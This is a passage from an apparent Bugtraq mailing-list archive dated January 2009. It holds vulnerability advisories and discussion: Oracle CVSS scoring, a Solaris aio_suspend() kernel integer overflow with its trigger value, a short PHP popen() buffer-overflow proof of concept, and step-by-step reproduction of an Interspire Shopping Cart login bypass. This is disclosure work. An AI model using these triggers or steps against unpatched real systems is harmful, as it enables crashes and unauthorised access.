    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:    60672 8a5ca81cd3803ad98afe963360242177
    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu6.1_lpia.deb
      Size/MD5:    52440 07bf6935608f398215f2880d5be9fd25

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:    43578 6876bb9233cf8352dfbf66bc95ddf7e9
    http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:   138186 b3868a2e0d935a95e9083773859f1cbe
    http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:  1663458 2bf2dae0699cf7dc45889dc678f20fcc
    http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:  2264178 b5b51d8116a46689275f98ea94e946af
    http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:   347972 af66fd54a390946c7b676cf54cb6e22e
    http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:   176964 0605e8b21a449afea97a3f5060af63e1
    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:    61336 79c4d467e37c334effe0b5ee31238901
    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu6.1_powerpc.deb
      Size/MD5:    57492 a6d2f97d74132b1f2a40599398ecd9b1

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/cups/cups-bsd_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:    37220 31f862d50b31324596054730ea09f7d3
    http://ports.ubuntu.com/pool/main/c/cups/cups-client_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:   117632 b594a8cb5b194fef18a0393968fe0736
    http://ports.ubuntu.com/pool/main/c/cups/cups-dbg_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:  1490260 01fcb6d2d1c062dcdfd6cde440ef2a98
    http://ports.ubuntu.com/pool/main/c/cups/cups_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:  2200956 ebfffd46f41befdda3e30e3cb1ab521e
    http://ports.ubuntu.com/pool/main/c/cups/libcups2-dev_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:   344800 6192418a2f2625f81551e9839d1187b4
    http://ports.ubuntu.com/pool/main/c/cups/libcups2_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:   165706 5804589b4f9bcc3bf016e3394f7acb7f
    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2-dev_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:    57906 34fef3b4e0a01df4a76c92768a8c292e
    http://ports.ubuntu.com/pool/main/c/cups/libcupsimage2_1.3.9-2ubuntu6.1_sparc.deb
      Size/MD5:    49792 24e09a0af0155fd8a13ca3f1db035c6d



--=-8+RKNzAtvycYMak0OXBq
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklrZOoACgkQLMAs/0C4zNoINwCfZAK8/Y4HVlvMxm+z2jqlkUpy
e1wAmgJgw52mwzHIivCQPwEqYRwoh/Dy
=KCk8
-----END PGP SIGNATURE-----

--=-8+RKNzAtvycYMak0OXBq--

From - Mon Jan 12 12:41:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005888
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39136-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7235BECE12
for <lists@securityspace.com>; Mon, 12 Jan 2009 12:41:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CE56D143774; Mon, 12 Jan 2009 09:36:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18122 invoked from network); 12 Jan 2009 16:10:56 -0000
From: "Integrigy Alerts" <alerts@integrigy.com>
To: <bugtraq@securityfocus.com>
Cc: "'security curmudgeon'" <jericho@attrition.org>
References: <4819D0C9.4070503@appsecinc.com>  <Pine.LNX.4.64.0901101046120.20559@forced.attrition.org> <1231611992.9972.7.camel@joxean-desktop.etxea.com>
In-Reply-To: <1231611992.9972.7.camel@joxean-desktop.etxea.com>
Subject: RE: Oracle Database Buffer Overflow in SYS.KUPF$FILE_INT.GET_FULL_FILENAME (Oracle CPU April 2008 DB11)
Date: Mon, 12 Jan 2009 10:29:04 -0600
Message-ID: <015601c974d2$e26fed30$a74fc790$@com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Thread-Index: AclzaGQaKjTMjEk7Q4iriTSiVqy8/gAG1mFQ
Content-Language: en-us
Status:   

The main problem with the Oracle CVSS base scores is more with CVSS than
Oracle.  Under the CVSSv2 definition of
Confidentiality/Integrity/Availability impact, if the entire database is
compromised but not the "entire system" then the metric value will be
Partial rather than Complete.  Since the large majority of Oracle database
vulnerabilities require a valid database session unless exploited via a
blended threat (i.e., such as SQL injection which is completely ignored by
Oracle in any analysis), the maximum realistic score for an Oracle database
vulnerability is 6.5 since CIA impact will only ever be Partial except in
rare occasions.  Oracle does include a "Partial+" in the advisories to
indicate where the entire database is compromised.  The CVSS definitions
around system vs. service vs. application should be strengthened in a future
version.

Additional information on the Oracle CVSS scores is at
http://www.integrigy.com/oracle-security-blog/archive/2006/10/27/oracle-cvss

Regarding the quality of information released by Oracle in the CPU
advisories,  I can easily understand why there are discrepancies between a
researcher's advisory and Oracle's.  Having worked with Oracle on over 50
vulnerabilities, my experience is that the Oracle security team generally
does not spend much effort to fully research, validate, and explore each
vulnerability.  Rather the focus is on confirming the vulnerability and
coordinating with development to fix the vulnerability as qualified and
documented by the security researcher.  If the researcher does not provide
full details or does not document a specific attack vector, then Oracle
probably won't include this in the fix or advisory.  This has resulted in a
few well publicized cases where the same vulnerability had to be fixed
multiple times since Oracle only fixed the bug based on the exact exploit
details/code provided by the security researcher.

-----Original Message-----
From: Joxean Koret [mailto:joxeankoret@yahoo.es] 
Sent: Saturday, January 10, 2009 12:27 PM
To: security curmudgeon
Cc: Team SHATTER; bugtraq@securityfocus.com; secalert_us@oracle.com
Subject: Re: Team SHATTER Security Advisory: Oracle Database Buffer Overflow
in SYS.KUPF$FILE_INT.GET_FULL_FILENAME (DB11)

Hi,

This is very typical and, in my opinion, you should only consider
trustworthy the Team Shatter's advisory, not the Oracle's one.

Take for example the bug APPS01[1] in Oracle Critical Patch Update of
April 2007 [2], it was a preauthenticated remote bug (with remote I mean
"from internet", not from "adjacent network"). CVSS2 Score would be 9/10
(calcule it yourself [3]), however, the Oracle advisory says that a
"Valid session" was needed and that the CVSS2 score was 4.2. It's funny.

>As a responsible security professional, I have to assume their research
>is accurate and their advisory should be taken more seriously than
>Oracle's.

Yes, don't trust the Oracle's advisories, the aren't real.

[1]http://www.zerodayinitiative.com/advisories/ZDI-08-088
[2]
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpua
pr2007.html
[3] http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Thanks,
Joxean Koret

On Sat, 2009-01-10 at 11:11 +0000, security curmudgeon wrote:
> 
> Summary: Team SHATTER says this is a remote overflow that allows for
> the 
> execution of arbitrary code (CVSS2 9.0). Oracle says this is a
> limited 
> DoS condition (CVSS2 4.0). That is a big discrepancy.
> 


From - Mon Jan 12 12:51:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005889
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39131-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 769B0EC797
for <lists@securityspace.com>; Mon, 12 Jan 2009 12:49:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6BA9F143C6A; Mon, 12 Jan 2009 09:09:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9614 invoked from network); 12 Jan 2009 11:07:58 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:mime-version:content-type:content-transfer-encoding
         :content-disposition;
        bh=ENFLKGMaevuGqvWaJbjRXLiHp+90tFth0mheyR1RTdU=;
        b=OXPm8M4IXBf421o4JYEV8Lwp5DOtXgCJJsD55cX304080kuqOFgVLOVTa6HuhPh8eC
         8QX5ITek3l6Z9XADKFa+yFMD1OxZjkg/T8mO6xF1/Ey3BaNnQzBneW5bXsGaMZy7gKww
         6bZVpd1ngP8NKYEzvLBedHF1iNnWF8x6xxWUQDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type
         :content-transfer-encoding:content-disposition;
        b=KSTotJMnu3QatS0anrpixtwkrgMxDSbJewKyBbCTSgGGPBin2Xvcanv3DQFHtdTDO8
         PuPcJoueY/3cS7zynMLOcKNfnqM4lLolnhC1d/Bxg82lOj+8GqRQVmg+r/SJnVXSfRcX
         qAj2rAqajBJ/2BN9xY4U2IxDaSu2ay0oQtW94Message-ID: <be41bf670901120330o4731b1e5oc59740c6fad899ac@mail.gmail.com>
Date: Mon, 12 Jan 2009 12:30:15 +0100
From: SmoKe <smokepower@gmail.com>
To: bugtraq@securityfocus.com
Subject: Hack Aethra SV 1042 Adsl/Voip Router
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Status:   

Hi,

with the blue serial cable ( console cable ), with advanced serial port monitor
( http://www.aggsoft.com/serial-port-monitor.htm )
you can retrive admin password of this router without reset or re-firmware....


Hack Aethra SV 1042 Adsl/Voip Router

Mod: AETHRA STARVOICE SV 1042

Boot Version: 1.8.0.0
Boot Date: 25/02/2004 12:12
ATOS Version: 2.0.25  (0@unknow)
ATOS Date: 26/10/2004 11:04
StarVoice version: 1.4.18
StarVoice model: SV1042
Les version: 1.4.12

Exploit:      Local

Vendor contacted 6 month ago, aethra have made a patch and informed all clients.

youtube

http://it.youtube.com/watch?v=_WK4KQJ8wVo

full

http://www.adrive.com/public/bb1b031b4b3ea243d7f61fcad55f57634e0c882356619b6e1cd538623e6969f5.html

bye


SmoKe

From - Mon Jan 12 13:01:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000588a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39124-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 36D16EC798
for <lists@securityspace.com>; Mon, 12 Jan 2009 12:53:38 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2C35A2374CE; Mon, 12 Jan 2009 08:50:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12273 invoked from network); 11 Jan 2009 16:26:08 -0000
X-RZG-CLASS-ID: mo00
X-RZG-AUTH: :OGckYVKpa/RorD1n4vbkpyN1OrydUB3M3D078vRVBTvDAWjAyZyLqHWpqw=Message-ID: <496A2309.4030908@trapkit.de>
Date: Sun, 11 Jan 2009 17:49:13 +0100
From: Tobias Klein <tk@trapkit.de>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [TKADV2009-001] Sun Solaris aio_suspend() Kernel Integer Overflow
 Vulnerability
Content-Type: multipart/mixed;
 boundary="------------020702070902080906090605"
Status:   

This is a multi-part message in MIME format.
--------------020702070902080906090605
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2009-001.txt

--------------020702070902080906090605
Content-Type: text/plain;
 name="TKADV2009-001.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="TKADV2009-001.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               Sun Solaris aio_suspend() Kernel Integer 
                        Overflow Vulnerability
Advisory ID:            TKADV2009-001
Revision:               1.0 
Release Date:           2009/01/08 
Last Modified:          2009/01/08
Date Reported:          2008/09/15
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Solaris  8 without patch 117350-59 (SPARC)
                        Solaris  9 without patch 138577-01 (SPARC)
                        Solaris 10 without patch 121394-02 (SPARC)
                        Solaris  8 without patch 117351-59 (x86)
                        Solaris  9 without patch 138578-01 (x86)
                        Solaris 10 without patch 121395-02 (x86)
                        OpenSolaris < build TBC (SPARC and x86)  
Remotely Exploitable:   No
Locally Exploitable:    Yes 
Vendor URL:             http://www.sun.com/ 
Vendor Status:          Vendor has released an updated version
Patch development time: 115 days


=====================Vulnerability Details: 
=====================
The kernel of Solaris contains a vulnerability in the code that handles 
SYS_kaio syscall requests on systems in 32 bit mode. Exploitation of this 
vulnerability can result in local denial of service attacks (system crash 
due to a kernel panic). As all Solaris Zones (Containers) share the same 
kernel it is possible to crash the whole system (all Zones) even if the 
vulnerability is triggered in an unprivileged non-global zone.

This kernel vulnerability can be exploited by an unprivileged local user.


=================Technical Details:
=================
The following source code references are based on the kernel source code 
available from http://www.opensolaris.org.

Source code file: /uts/common/os/aio.c

[..]
221 static int64_t
222 kaioc(
223        long  a0,
224        long  a1,
225        long  a2,
226        long  a3,
227        long  a4,
228        long  a5)
229 {
230        int  error;
231        long rval = 0;
232
233        switch ((int)a0 & ~AIO_POLL_BIT) {
...
266        case AIOSUSPEND:
267 [1]        error = aiosuspend((void *)a1, (int)a2, (timespec_t *)a3,
268                (int)a4, &rval, AIO_64);
269            break;
[..]

[1] The parameters "a1", "a2", "a3" and "a4" of the "aiosuspend()" function
    are user controlled.

Source code file: /uts/common/os/aio.c

[..]
897   static int
898   aiosuspend(
899          void   *aiocb,
900          int    nent,
901          struct timespec   *timout,
902          int    flag,
903          long   *rval,
904          int    run_mode)
905   {
...
925        aiop = curproc->p_aio;
926 [2]    if (aiop == NULL || nent <= 0)
927               return (EINVAL);
...
951        if (model == DATAMODEL_NATIVE)
952 [3]           ssize = (sizeof (aiocb_t *) * nent);
953      #ifdef _SYSCALL32_IMPL
954        else
955 [3]           ssize = (sizeof (caddr32_t) * nent);
956      #endif  /* _SYSCALL32_IMPL */
957 
958 [4]    cbplist = kmem_alloc(ssize, KM_NOSLEEP);
[..]

[2] As "nent" is controlled by the user this check can be passed if 
    "nent" > 0.
[3] The value of "ssize" is calculated using the user controlled value of 
    "nent". By supplying a value of 0x3fffffff for "nent" an integer 
    overflow will happen that results in "ssize" = 0x00000000. The 
    "kmem_alloc()" function is now called with a length value of 
    0x00000000 (see [4]). The "kmem_alloc()" function itself calls 
    "vmem_alloc()" with a "size" value of 0x00000000 which calls 
    "vmem_xalloc()" with the same "size" value.


Source code file: /lib/libumem/common/vmem.c

[..]
815 void *
816 vmem_xalloc(vmem_t *vmp, size_t size, size_t align, size_t phase,
817   size_t nocross, void *minaddr, void *maxaddr, int vmflag)
818 {
...
934 [6]  if (size == 0)
935         umem_panic("vmem_xalloc(): size == 0");
[..]

[6] If a "size" value of 0x00000000 is supplied to the "vmem_xalloc()" 
    function the kernel panics. This leads to a system crash (denial of 
    service).


========Solution: 
========
This issue is addressed in the following patch releases from Sun:

SPARC Platform
    - Solaris 8 with patch 117350-59 or later
    - Solaris 9 with patch 138577-01 or later
    - Solaris 10 with patch 121394-02 or later
    - OpenSolaris build TBC

x86 Platform
    - Solaris 8 with patch 117351-59 or later
    - Solaris 9 with patch 138578-01 or later
    - Solaris 10 with patch 121395-02 or later
    - Opensolaris build TBC


=======History: 
=======
  2008/09/15 - Vendor notified  
  2008/09/16 - Vendor confirms the vulnerability
  2009/01/08 - Public disclosure of vulnerability details by Sun 
  2009/01/08 - Release date of this security advisory


=======Credits: 
=======
  Vulnerability found and advisory written by Tobias Klein.


==========References: 
==========
  [1] http://sunsolve.sun.com/search/document.do?assetkey=1-66-247986-1
  [2] http://www.trapkit.de/advisories/TKADV2009-001.txt


=======Changes: 
=======
  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


==========Disclaimer:
==========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


=================PGP Signature Key: 
=================
  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2009 Tobias Klein. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG

iD8DBQFJaiEKkXxgcAIbhEERAi2vAKCz4kA50uoS0YZAR0XbfS2S2FbruACcCprB
FsiAvTxq5KXE6iNECznlbyA=P5+L
-----END PGP SIGNATURE-----

--------------020702070902080906090605--

From - Mon Jan 12 13:01:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000588b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39135-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id BD54FEC798
for <lists@securityspace.com>; Mon, 12 Jan 2009 12:56:06 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id B0373143AD0; Mon, 12 Jan 2009 09:12:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11606 invoked from network); 12 Jan 2009 13:13:12 -0000
Date: 12 Jan 2009 13:36:37 -0000
Message-ID: <20090112133637.24790.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: ew1zz@hotmail.com
To: bugtraq@securityfocus.com
Subject: PHP Buffer Overflow(popen)
Status:   

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)

Type: Remote and Local

Requirements for exploit: popen() enabled.


By: e.wiZz!  Enes Mu�i&#263;   ew1zz@hotmail.com


PHP Popen() function overview:

Popen function in php opens a pipe to a process executed by forking the command given by command.
It was implementet since PHP 4 version.
     popen ( string $command_to_execute , string $mode )

Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache here,is because
when we execute poc.php Apache HTTP server crash without any report in error log.You can test on WAMP too,on CLI or browser.


Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11


PoC:


<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>

From - Mon Jan 12 13:11:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000588c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39133-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 783C7ECDB8
for <lists@securityspace.com>; Mon, 12 Jan 2009 13:07:04 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A3942143AB2; Mon, 12 Jan 2009 09:10:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13084 invoked from network); 12 Jan 2009 14:35:40 -0000
Date: Mon, 12 Jan 2009 21:57:42 +0700
From: Nam Nguyen <namn@bluemoon.com.vn>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [BMSA-2009-01] Authentication bypass in Interspire Shopping Cart
 v4.0.1 and below
Message-Id: <20090112215742.a0e64e13.namn@bluemoon.com.vn>
Organization: Blue Moon Consulting Co., Ltd
X-Mailer: Sylpheed 2.6.0 (GTK+ 2.10.14; i686-pc-mingw32)
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature";
 micalg="PGP-SHA1";
 boundary="Signature=_Mon__12_Jan_2009_21_57_42_+0700_G9EH.7Zhk2hyzpta"
Status:   

--Signature=_Mon__12_Jan_2009_21_57_42_+0700_G9EH.7Zhk2hyzpta
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

BLUE MOON SECURITY ADVISORY 2009-01
===================================


:Title: Authentication bypass in Interspire Shopping Cart
:Severity: Critical
:Reporter: Truong Van Tri and Blue Moon Consulting
:Products: Interspire Shopping Cart v4.0.1 Ultimate edition
:Fixed in: v4.0.2


Description
-----------

Interspire Shopping Cart (ISC) is ecommerce software that includes everything you need to start, run, promote and profit from your online store. It combines easy-to-customize store designs with marketing tools proven to significantly increase your sales.

In v4.0.1, ISC suffers from an authentication bypass problem. This allows anyone to login to ISC's control panel without knowing the administrator's password.

The problem is with ``class.auth.php``'s ``ProcessLogin`` function. This function sets a HTTPOnly cookie flag ``RememberToken`` too early in the process, even before the user is authenticated. A malicious user could force ``ProcessLogin`` to set this cookie by ticking on ``Remember me`` at the login page, entering targeted username such as ``admin``, and anything as password. This first attemp will fail, but the cookie is already set, and ready to authenticate him/her to the control panel.

Blue Moon Consulting has verified the bug in version 4.0.1 Ultimate edition being showcased at http://www.interspire.com/shoppingcart/demo.php. It is highly likely that it also exists in older versions.

Workaround
----------

There is no workaround. Please apply the fix.

Fix
---

The problem has been fixed in v4.0.2.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  January 07, 2009: Initial contact sent to customerservice@interspire.com and sales@interspire.com

:Vendor response:

  January 08, 2009: Chris Boulton requested further communications to be addressed to him directly.

:Further communication:

  January 08, 2009: Prepared advisory is sent to Chris and regular update is requested.

  January 08, 2009: Chris updated us with a proper fix.

  January 08, 2009: Mitchell Harper updated us with Interspire's notification to their customers.

  January 08, 2009: Mitchell and Chris requested us to hold off full disclosure in 6 weeks to allow time for Interspire customers to get patched.

  January 08, 2009: We agreed to hold it off till 4.0.2 was released.

  January 08, 2009: Draft advisory was sent to Chris and Mitchell.

  January 08, 2009: Chris clarified that 4.0.2 had been released to address the issue.

  January 12, 2009: Mitchell requested us not to include full details such as steps to reproduce the bug.

  January 12, 2009: We explained our disclosure policy again to Mitchell, and sent an updated advisory.

:Public disclosure: January 12, 2009

:Exploit code: No exploit code is needed.

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

--Signature=_Mon__12_Jan_2009_21_57_42_+0700_G9EH.7Zhk2hyzpta
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAklrWmYACgkQbKzcTD214ZeHkQCfYTV5y/x+UWWDwWa//nuUWzwA
3ScAn3Lfmb4EEXepEzDGPjJlT6ryaPP4
=ew7i
-----END PGP SIGNATURE-----

--Signature=_Mon__12_Jan_2009_21_57_42_+0700_G9EH.7Zhk2hyzpta--

From - Mon Jan 12 13:31:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000588e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39127-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 37182ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 13:22:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6BCA02374D5; Mon, 12 Jan 2009 08:55:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26264 invoked from network); 11 Jan 2009 21:25:41 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR SBL_XBL_SPAMHAUS=ERR NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -4.6
Date: Sun, 11 Jan 2009 22:48:23 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090111214823.GA32218@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.237.187
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1700-1] New lasso packages fix validation bypass
Priority: urgent
Resent-Message-ID: <aAiPYkFfe0O.A.pcH.JlmaJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
